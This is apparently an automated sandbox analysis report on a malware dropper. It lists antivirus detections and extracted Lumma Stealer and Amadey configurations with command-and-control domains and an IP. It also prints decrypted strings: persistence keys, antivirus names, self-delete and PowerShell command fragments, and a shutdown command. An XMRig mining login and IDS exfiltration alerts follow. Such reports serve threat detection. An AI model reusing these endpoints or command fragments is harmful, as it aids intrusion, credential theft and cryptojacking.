Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WDKI0JR2\Fe36XBk[1].exe	Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\JeDkUsy6Fzs0.bat	Avira: detection malicious, Label: BAT/Delbat.C

Found malware configuration

Source: 0000000C.00000002.2307708162.00000000045B9000.00000004.00000800.00020000.00000000.sdmp	Malware Configuration Extractor: LummaC {"C2 url": ["importenptoc.com", "voicesharped.com", "inputrreparnt.com", "torpdidebar.com", "rebeldettern.com", "actiothreaz.com", "garulouscuto.com", "breedertremnd.com"], "Build id": "LkkSUe--liveO"}
Source: 00000002.00000002.1401755271.0000000000121000.00000040.00000001.01000000.00000007.sdmp	Malware Configuration Extractor: Amadey {"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4UK5I61J\Ryu8yUx[1].exe	ReversingLabs: Detection: 34%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\kUHbhqh[1].exe	ReversingLabs: Detection: 21%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WDKI0JR2\Fe36XBk[1].exe	ReversingLabs: Detection: 52%
Source: C:\Users\user\AppData\Local\Temp\1074057001\Fe36XBk.exe	ReversingLabs: Detection: 52%
Source: C:\Users\user\AppData\Local\Temp\1074058001\kUHbhqh.exe	ReversingLabs: Detection: 21%
Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exe	ReversingLabs: Detection: 34%
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	ReversingLabs: Detection: 57%

Multi AV Scanner detection for submitted file

Source: Mc3FDUMnVz.exe	Virustotal: Detection: 46%			Perma Link
Source: Mc3FDUMnVz.exe	ReversingLabs: Detection: 57%

Joe Sandbox ML detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4UK5I61J\Ryu8yUx[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1074057001\Fe36XBk.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WDKI0JR2\Fe36XBk[1].exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: Mc3FDUMnVz.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 0000000C.00000002.2307708162.00000000045B9000.00000004.00000800.00020000.00000000.sdmp	String decryptor: importenptoc.com
Source: 0000000C.00000002.2307708162.00000000045B9000.00000004.00000800.00020000.00000000.sdmp	String decryptor: voicesharped.com
Source: 0000000C.00000002.2307708162.00000000045B9000.00000004.00000800.00020000.00000000.sdmp	String decryptor: inputrreparnt.com
Source: 0000000C.00000002.2307708162.00000000045B9000.00000004.00000800.00020000.00000000.sdmp	String decryptor: torpdidebar.com
Source: 0000000C.00000002.2307708162.00000000045B9000.00000004.00000800.00020000.00000000.sdmp	String decryptor: rebeldettern.com
Source: 0000000C.00000002.2307708162.00000000045B9000.00000004.00000800.00020000.00000000.sdmp	String decryptor: actiothreaz.com
Source: 0000000C.00000002.2307708162.00000000045B9000.00000004.00000800.00020000.00000000.sdmp	String decryptor: garulouscuto.com
Source: 0000000C.00000002.2307708162.00000000045B9000.00000004.00000800.00020000.00000000.sdmp	String decryptor: breedertremnd.com
Source: 00000002.00000002.1401755271.0000000000121000.00000040.00000001.01000000.00000007.sdmp	String decryptor: 185.215.113.43
Source: 00000002.00000002.1401755271.0000000000121000.00000040.00000001.01000000.00000007.sdmp	String decryptor: /Zu7JuNko/index.php
Source: 00000002.00000002.1401755271.0000000000121000.00000040.00000001.01000000.00000007.sdmp	String decryptor: S-%lu-
Source: 00000002.00000002.1401755271.0000000000121000.00000040.00000001.01000000.00000007.sdmp	String decryptor: abc3bc1985
Source: 00000002.00000002.1401755271.0000000000121000.00000040.00000001.01000000.00000007.sdmp	String decryptor: skotes.exe
Source: 00000002.00000002.1401755271.0000000000121000.00000040.00000001.01000000.00000007.sdmp	String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
Source: 00000002.00000002.1401755271.0000000000121000.00000040.00000001.01000000.00000007.sdmp	String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
Source: 00000002.00000002.1401755271.0000000000121000.00000040.00000001.01000000.00000007.sdmp	String decryptor: Startup
Source: 00000002.00000002.1401755271.0000000000121000.00000040.00000001.01000000.00000007.sdmp	String decryptor: cmd /C RMDIR /s/q
Source: 00000002.00000002.1401755271.0000000000121000.00000040.00000001.01000000.00000007.sdmp	String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Source: 00000002.00000002.1401755271.0000000000121000.00000040.00000001.01000000.00000007.sdmp	String decryptor: rundll32
Source: 00000002.00000002.1401755271.0000000000121000.00000040.00000001.01000000.00000007.sdmp	String decryptor: Programs
Source: 00000002.00000002.1401755271.0000000000121000.00000040.00000001.01000000.00000007.sdmp	String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
Source: 00000002.00000002.1401755271.0000000000121000.00000040.00000001.01000000.00000007.sdmp	String decryptor: %USERPROFILE%
Source: 00000002.00000002.1401755271.0000000000121000.00000040.00000001.01000000.00000007.sdmp	String decryptor: cred.dll\|clip.dll\|
Source: 00000002.00000002.1401755271.0000000000121000.00000040.00000001.01000000.00000007.sdmp	String decryptor: cred.dll
Source: 00000002.00000002.1401755271.0000000000121000.00000040.00000001.01000000.00000007.sdmp	String decryptor: clip.dll
Source: 00000002.00000002.1401755271.0000000000121000.00000040.00000001.01000000.00000007.sdmp	String decryptor: http://
Source: 00000002.00000002.1401755271.0000000000121000.00000040.00000001.01000000.00000007.sdmp	String decryptor: https://
Source: 00000002.00000002.1401755271.0000000000121000.00000040.00000001.01000000.00000007.sdmp	String decryptor: /quiet
Source: 00000002.00000002.1401755271.0000000000121000.00000040.00000001.01000000.00000007.sdmp	String decryptor: /Plugins/
Source: 00000002.00000002.1401755271.0000000000121000.00000040.00000001.01000000.00000007.sdmp	String decryptor: &unit=
Source: 00000002.00000002.1401755271.0000000000121000.00000040.00000001.01000000.00000007.sdmp	String decryptor: shell32.dll
Source: 00000002.00000002.1401755271.0000000000121000.00000040.00000001.01000000.00000007.sdmp	String decryptor: kernel32.dll
Source: 00000002.00000002.1401755271.0000000000121000.00000040.00000001.01000000.00000007.sdmp	String decryptor: GetNativeSystemInfo
Source: 00000002.00000002.1401755271.0000000000121000.00000040.00000001.01000000.00000007.sdmp	String decryptor: ProgramData\
Source: 00000002.00000002.1401755271.0000000000121000.00000040.00000001.01000000.00000007.sdmp	String decryptor: AVAST Software
Source: 00000002.00000002.1401755271.0000000000121000.00000040.00000001.01000000.00000007.sdmp	String decryptor: Kaspersky Lab
Source: 00000002.00000002.1401755271.0000000000121000.00000040.00000001.01000000.00000007.sdmp	String decryptor: Panda Security
Source: 00000002.00000002.1401755271.0000000000121000.00000040.00000001.01000000.00000007.sdmp	String decryptor: Doctor Web
Source: 00000002.00000002.1401755271.0000000000121000.00000040.00000001.01000000.00000007.sdmp	String decryptor: 360TotalSecurity
Source: 00000002.00000002.1401755271.0000000000121000.00000040.00000001.01000000.00000007.sdmp	String decryptor: Bitdefender
Source: 00000002.00000002.1401755271.0000000000121000.00000040.00000001.01000000.00000007.sdmp	String decryptor: Norton
Source: 00000002.00000002.1401755271.0000000000121000.00000040.00000001.01000000.00000007.sdmp	String decryptor: Sophos
Source: 00000002.00000002.1401755271.0000000000121000.00000040.00000001.01000000.00000007.sdmp	String decryptor: Comodo
Source: 00000002.00000002.1401755271.0000000000121000.00000040.00000001.01000000.00000007.sdmp	String decryptor: WinDefender
Source: 00000002.00000002.1401755271.0000000000121000.00000040.00000001.01000000.00000007.sdmp	String decryptor: 0123456789
Source: 00000002.00000002.1401755271.0000000000121000.00000040.00000001.01000000.00000007.sdmp	String decryptor: Content-Type: multipart/form-data; boundary=----
Source: 00000002.00000002.1401755271.0000000000121000.00000040.00000001.01000000.00000007.sdmp	String decryptor: ------
Source: 00000002.00000002.1401755271.0000000000121000.00000040.00000001.01000000.00000007.sdmp	String decryptor: ?scr=1
Source: 00000002.00000002.1401755271.0000000000121000.00000040.00000001.01000000.00000007.sdmp	String decryptor: Content-Type: application/x-www-form-urlencoded
Source: 00000002.00000002.1401755271.0000000000121000.00000040.00000001.01000000.00000007.sdmp	String decryptor: SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName
Source: 00000002.00000002.1401755271.0000000000121000.00000040.00000001.01000000.00000007.sdmp	String decryptor: ComputerName
Source: 00000002.00000002.1401755271.0000000000121000.00000040.00000001.01000000.00000007.sdmp	String decryptor: abcdefghijklmnopqrstuvwxyz0123456789-_
Source: 00000002.00000002.1401755271.0000000000121000.00000040.00000001.01000000.00000007.sdmp	String decryptor: -unicode-
Source: 00000002.00000002.1401755271.0000000000121000.00000040.00000001.01000000.00000007.sdmp	String decryptor: SYSTEM\CurrentControlSet\Control\UnitedVideo\CONTROL\VIDEO\
Source: 00000002.00000002.1401755271.0000000000121000.00000040.00000001.01000000.00000007.sdmp	String decryptor: SYSTEM\ControlSet001\Services\BasicDisplay\Video
Source: 00000002.00000002.1401755271.0000000000121000.00000040.00000001.01000000.00000007.sdmp	String decryptor: VideoID
Source: 00000002.00000002.1401755271.0000000000121000.00000040.00000001.01000000.00000007.sdmp	String decryptor: DefaultSettings.XResolution
Source: 00000002.00000002.1401755271.0000000000121000.00000040.00000001.01000000.00000007.sdmp	String decryptor: DefaultSettings.YResolution
Source: 00000002.00000002.1401755271.0000000000121000.00000040.00000001.01000000.00000007.sdmp	String decryptor: SOFTWARE\Microsoft\Windows NT\CurrentVersion
Source: 00000002.00000002.1401755271.0000000000121000.00000040.00000001.01000000.00000007.sdmp	String decryptor: ProductName
Source: 00000002.00000002.1401755271.0000000000121000.00000040.00000001.01000000.00000007.sdmp	String decryptor: CurrentBuild
Source: 00000002.00000002.1401755271.0000000000121000.00000040.00000001.01000000.00000007.sdmp	String decryptor: rundll32.exe
Source: 00000002.00000002.1401755271.0000000000121000.00000040.00000001.01000000.00000007.sdmp	String decryptor: "taskkill /f /im "
Source: 00000002.00000002.1401755271.0000000000121000.00000040.00000001.01000000.00000007.sdmp	String decryptor: " && timeout 1 && del
Source: 00000002.00000002.1401755271.0000000000121000.00000040.00000001.01000000.00000007.sdmp	String decryptor: && Exit"
Source: 00000002.00000002.1401755271.0000000000121000.00000040.00000001.01000000.00000007.sdmp	String decryptor: " && ren
Source: 00000002.00000002.1401755271.0000000000121000.00000040.00000001.01000000.00000007.sdmp	String decryptor: Powershell.exe
Source: 00000002.00000002.1401755271.0000000000121000.00000040.00000001.01000000.00000007.sdmp	String decryptor: -executionpolicy remotesigned -File "
Source: 00000002.00000002.1401755271.0000000000121000.00000040.00000001.01000000.00000007.sdmp	String decryptor: shutdown -s -t 0
Source: 00000002.00000002.1401755271.0000000000121000.00000040.00000001.01000000.00000007.sdmp	String decryptor: random

Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exe

Code function: 13_2_00419A00 CryptUnprotectData,

13_2_00419A00

Exploits

Yara detected UAC Bypass using CMSTP

Source: Yara match	File source: 10.2.Fe36XBk.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000A.00000002.1939471924.0000000000413000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY

Bitcoin Miner

Detected Stratum mining protocol

Source: global traffic	TCP traffic: 192.168.2.9:51780 -> 162.19.139.184:2222 payload: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"4a8mevpr5km4ny7bkpdqgjdkghb22gtal9mhtqkbjxwwj329evfhevcvzck7euh5nedpu5dvaeppocr2bznv1zjnlkvr1aa.rig_cpu","pass":"x","agent":"xmrig/6.21.0 (windows nt 10.0; win64; x64) libuv/1.44.2 msvc/2019","algo":["rx/0","cn/2","cn/r","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double","cn/ccx","cn-lite/1","cn-heavy/0","cn-heavy/tube","cn-heavy/xhv","cn-pico","cn-pico/tlo","cn/upx2","cn/1","rx/wow","rx/arq","rx/graft","rx/sfx","rx/keva","argon2/chukwa","argon2/chukwav2","argon2/ninja","ghostrider"]}}.
Source: global traffic	TCP traffic: 192.168.2.9:51782 -> 162.19.139.184:2222 payload: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"4a8mevpr5km4ny7bkpdqgjdkghb22gtal9mhtqkbjxwwj329evfhevcvzck7euh5nedpu5dvaeppocr2bznv1zjnlkvr1aa.rig_cpu","pass":"x","agent":"xmrig/6.21.0 (windows nt 10.0; win64; x64) libuv/1.44.2 msvc/2019","algo":["rx/0","cn/2","cn/r","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double","cn/ccx","cn-lite/1","cn-heavy/0","cn-heavy/tube","cn-heavy/xhv","cn-pico","cn-pico/tlo","cn/upx2","cn/1","rx/wow","rx/arq","rx/graft","rx/sfx","rx/keva","argon2/chukwa","argon2/chukwav2","argon2/ninja","ghostrider"]}}.

Source: Mc3FDUMnVz.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Users\user\AppData\Local\Temp\is-GEAO5.tmp\Stamp_Setup.tmp

Registry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Skinny Orange_is1

Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.9:51681 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.9:51682 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.9:51685 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.9:51689 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.9:51690 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.9:51692 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.9:51694 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.9:51698 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.159.133.233:443 -> 192.168.2.9:51761 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.9:51764 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.199.111.133:443 -> 192.168.2.9:51767 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.199.111.133:443 -> 192.168.2.9:51769 version: TLS 1.2

Source:	Binary string: c:\omtnkdoj\bnwv\yogisfk\cqf.pdb source: Fe36XBk.exe, 0000000A.00000003.1910049525.00000000047FF000.00000004.00001000.00020000.00000000.sdmp, Fe36XBk.exe, 0000000A.00000002.1939471924.0000000000410000.00000040.00000001.01000000.00000009.sdmp
Source:	Binary string: c:\bfllk\pdgh\qovxk\wqdtbmac.pdb source: Fe36XBk.exe, 0000000A.00000002.1948214053.000000000719E000.00000004.00000020.00020000.00000000.sdmp, Fe36XBk.exe, 0000000A.00000002.1943694439.0000000000A3A000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: Purpose.pdb source: Ryu8yUx.exe, 0000000C.00000002.2307708162.00000000045B9000.00000004.00000800.00020000.00000000.sdmp, Ryu8yUx.exe, 0000000C.00000000.2135542163.0000000000FF2000.00000002.00000001.01000000.0000000C.sdmp, Ryu8yUx[1].exe.7.dr
Source:	Binary string: c:\jfmo\tlcp\nyvnyt\obocmwsb.pdb source: Fe36XBk.exe, 0000000A.00000002.1945694589.0000000005066000.00000004.00000020.00020000.00000000.sdmp, Fe36XBk.exe, 0000000A.00000002.1948214053.000000000719E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: c:\bfllk\pdgh\qovxk\wqdtbmac.pdb/; source: Fe36XBk.exe, 0000000A.00000002.1948214053.000000000719E000.00000004.00000020.00020000.00000000.sdmp, Fe36XBk.exe, 0000000A.00000002.1943694439.0000000000A3A000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: c:\jfmo\tlcp\nyvnyt\obocmwsb.pdb/; source: Fe36XBk.exe, 0000000A.00000002.1945694589.0000000005066000.00000004.00000020.00020000.00000000.sdmp, Fe36XBk.exe, 0000000A.00000002.1948214053.000000000719E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: c:\zlib-dll\Release\isunzlib.pdb source: Stamp_Setup.tmp, 00000018.00000003.2651445491.00000000021F2000.00000004.00001000.00020000.00000000.sdmp, Stamp_Setup.tmp, 00000018.00000003.2648285782.00000000031A0000.00000004.00001000.00020000.00000000.sdmp, Stamp_Setup.tmp, 0000001A.00000003.2661533392.0000000002180000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.26.dr, _isdecmp.dll.24.dr

Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exe	Code function: 4x nop then mov ebx, ecx	13_2_0040F060
Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exe	Code function: 4x nop then movzx esi, byte ptr [esp+ecx+0Ch]	13_2_0043E150
Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exe	Code function: 4x nop then mov edx, ecx	13_2_0043E150
Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exe	Code function: 4x nop then push esi	13_2_00419A00
Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exe	Code function: 4x nop then jmp eax	13_2_00419A00
Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exe	Code function: 4x nop then cmp word ptr [esi+eax], 0000h	13_2_00419A00
Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exe	Code function: 4x nop then lea edx, dword ptr [ecx+01h]	13_2_0040F4DA
Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exe	Code function: 4x nop then mov ecx, eax	13_2_00443EA7
Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exe	Code function: 4x nop then mov word ptr [ecx], dx	13_2_004436B9
Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exe	Code function: 4x nop then movzx ebx, byte ptr [esp+edi+3D954FEDh]	13_2_0040CFD3
Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exe	Code function: 4x nop then mov byte ptr [ebx], cl	13_2_00431800
Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exe	Code function: 4x nop then cmp byte ptr [edi+eax+01h], 00000000h	13_2_0042D831
Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exe	Code function: 4x nop then mov esi, eax	13_2_0041A8BA
Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exe	Code function: 4x nop then lea edi, dword ptr [esi+esi]	13_2_0043314D
Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exe	Code function: 4x nop then mov word ptr [ebx], cx	13_2_00426150
Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exe	Code function: 4x nop then movzx eax, byte ptr [ecx+esi]	13_2_00429970
Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exe	Code function: 4x nop then mov ecx, eax	13_2_0042B175
Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exe	Code function: 4x nop then movzx esi, byte ptr [esp+ecx+16h]	13_2_0040C920
Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exe	Code function: 4x nop then mov dword ptr [esi], FFFFFFFFh	13_2_004019E0
Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exe	Code function: 4x nop then push eax	13_2_004431FF
Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exe	Code function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]	13_2_0040A240
Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exe	Code function: 4x nop then movzx ecx, word ptr [edi+esi*4]	13_2_0040A240
Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exe	Code function: 4x nop then cmp byte ptr [esi+ebx], 00000000h	13_2_00430A40
Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exe	Code function: 4x nop then movzx ebx, byte ptr [edx]	13_2_0043B250
Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exe	Code function: 4x nop then mov byte ptr [edi], al	13_2_0041FA3E
Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx+759F8BA2h]	13_2_00444280
Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exe	Code function: 4x nop then lea edi, dword ptr [esi+esi]	13_2_004330DC
Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exe	Code function: 4x nop then cmp word ptr [ebp+eax+00h], 0000h	13_2_00420AB0
Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exe	Code function: 4x nop then movzx ebx, byte ptr [eax+edx]	13_2_00423340
Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exe	Code function: 4x nop then movsx edx, byte ptr [esi+eax]	13_2_00418B60
Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exe	Code function: 4x nop then cmp dword ptr [edx+ecx*8], 089E115Eh	13_2_00445B00
Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exe	Code function: 4x nop then movzx edi, byte ptr [esp+eax+0C61266Ch]	13_2_00445B00
Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exe	Code function: 4x nop then mov ecx, eax	13_2_0041F3C0
Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exe	Code function: 4x nop then push esi	13_2_0042B3D3
Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exe	Code function: 4x nop then movzx ebx, byte ptr [esp+edx+06h]	13_2_0040E380
Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exe	Code function: 4x nop then mov ecx, eax	13_2_0040DB91
Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exe	Code function: 4x nop then mov eax, ebx	13_2_0040FB9E
Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exe	Code function: 4x nop then movzx esi, byte ptr [esp+ecx+2F3FA6E8h]	13_2_00441BA0
Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 2C1F0655h	13_2_00441BA0
Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exe	Code function: 4x nop then mov esi, ecx	13_2_0041BC47
Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exe	Code function: 4x nop then mov esi, ecx	13_2_0041A733
Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 2C331E1Fh	13_2_00418C20
Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exe	Code function: 4x nop then jmp eax	13_2_00418C20
Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], E40A7173h	13_2_00418C20
Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exe	Code function: 4x nop then mov byte ptr [edx], bl	13_2_0040C4C0
Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exe	Code function: 4x nop then mov esi, ecx	13_2_0041BCF6
Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exe	Code function: 4x nop then movzx edx, byte ptr [eax+ecx-07h]	13_2_0042ED44
Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exe	Code function: 4x nop then mov ecx, eax	13_2_0042ED44
Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exe	Code function: 4x nop then mov word ptr [edi], ax	13_2_0040FD7A
Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exe	Code function: 4x nop then mov esi, eax	13_2_0041B500
Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exe	Code function: 4x nop then movzx ebx, byte ptr [esp+edx+02h]	13_2_00442D3C
Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 2C331E1Fh	13_2_00426650
Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx+1D78B1A5h]	13_2_0041FE58
Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exe	Code function: 4x nop then cmp dword ptr [edx+ecx*8], B130B035h	13_2_00445E70
Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exe	Code function: 4x nop then dec ebx	13_2_00444625
Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exe	Code function: 4x nop then cmp dword ptr [ebp+ebx*8+00h], E389C079h	13_2_0043EE20
Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exe	Code function: 4x nop then cmp dword ptr [ebx+edi*8], 4802CC78h	13_2_0041DEF0
Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exe	Code function: 4x nop then movzx esi, byte ptr [esp+edx+04h]	13_2_0041DEF0
Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exe	Code function: 4x nop then mov esi, ecx	13_2_0041DEF0
Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exe	Code function: 4x nop then mov edi, ecx	13_2_0041DEF0
Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exe	Code function: 4x nop then mov word ptr [ecx], bp	13_2_00420F54
Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exe	Code function: 4x nop then movzx edi, byte ptr [esi+ecx]	13_2_0042DF66
Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exe	Code function: 4x nop then mov word ptr [ecx], bp	13_2_00420F67
Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exe	Code function: 4x nop then mov byte ptr [ebx], cl	13_2_00431703
Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exe	Code function: 4x nop then add ebp, dword ptr [esp+0Ch]	13_2_00430F10
Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	13_2_0042F7E0
Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exe	Code function: 4x nop then mov esi, ecx	13_2_0041AFF7
Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exe	Code function: 4x nop then movzx edi, byte ptr [ecx+esi]	13_2_00402780
Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exe	Code function: 4x nop then movzx esi, byte ptr [esp+eax+000000EFh]	13_2_0041BF8A

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.9:51665 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.9:51669 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2856122 - Severity 1 - ETPRO MALWARE Amadey CnC Response M1 : 185.215.113.43:80 -> 192.168.2.9:51666
Source: Network traffic	Suricata IDS: 2035595 - Severity 1 - ET MALWARE Generic AsyncRAT/zgRAT Style SSL Cert : 93.88.203.169:56001 -> 192.168.2.9:51679
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.9:51683 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2856122 - Severity 1 - ETPRO MALWARE Amadey CnC Response M1 : 185.215.113.43:80 -> 192.168.2.9:51677
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.9:51671 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.9:51681 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.9:51681 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.9:51682 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.9:51682 -> 188.114.96.3:443
